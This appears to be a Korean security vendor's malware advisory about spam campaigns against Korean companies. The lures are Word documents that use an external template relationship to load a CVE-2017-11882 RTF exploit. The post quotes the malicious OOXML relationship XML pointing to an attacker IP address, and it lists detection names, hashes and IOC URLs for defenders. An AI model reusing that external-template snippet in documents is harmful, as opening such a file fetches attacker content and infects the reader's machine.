MS Office Word 문서 External 외부 연결 접속을 이용한 RTF 취약점(CVE-2017-11882) 악성코드 유포 사례가 확인되었다. 국내 쇼핑몰 등 기업을 대상으로 스팸메일을 이용하여 악성코드가 유포되고 있어 주의가 필요하다.
최근들어 External 접속을 이용한 오피스 문서 악성파일 유포가 눈에 띄게 증가하고 있다. OOXML(Office Open XML) 포맷의 정상적인 XML Relationship을 이용하여 Target 주소만 악성 URL을 이용하기 때문에, 파일 바이너리만으로는 악성 여부를 판단하기가 어렵다. 아래는 문서에 삽입된 악성 URL이다. 문서 오픈시 자동으로 악성 URL에 접속을 시도한다.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame"
Target="http://23.95.122.25/..-.-................-.....-------------/........................................................................dot" TargetMode="External"/></Relationships>
접속 이후엔 RTF 취약점 파일 바이너리를 현재 오픈한 문서에 로드하게 된다. 취약점은 CVE-2017-11882로 과거 취약점이다. VirusTotal 에서 조회해보면 안랩 V3를 포함해 이미 다수의 AV 제품에서 진단하고 있는 형태이다.
MS Office Word 문서 파일을 악성 파일로 진단하고 있지 않더라도, 실행 단계에서 RTF 바이너리가 로드되었다면 아래와 같이 실시간으로 V3 제품에서 차단하여 피해를 막을 수 있다.
안랩에서는 실시간 실행 단계 차단 외에 관련 유형 파일을 아래와 같이 진단하고 있다.
[파일 진단]
Downloader/XML.External
Downloader/DOC.External
Downloader/XML.External.S1461
RTF/Malform-A.Gen
[IOC]
3fdc2e4e52b6499def0ff7411a7e0060
506e20689941bee2677c7214bc2083f2
e70135cdb555ce99adee7df642813dcb
hxxp://23.95.122.25/..-.-…………….-…..————-/…………………………………………………….dot
hxxp://23.95.122.25/..-.-…………….-…..————-/………………………………………………………………dot
Categories:악성코드 정보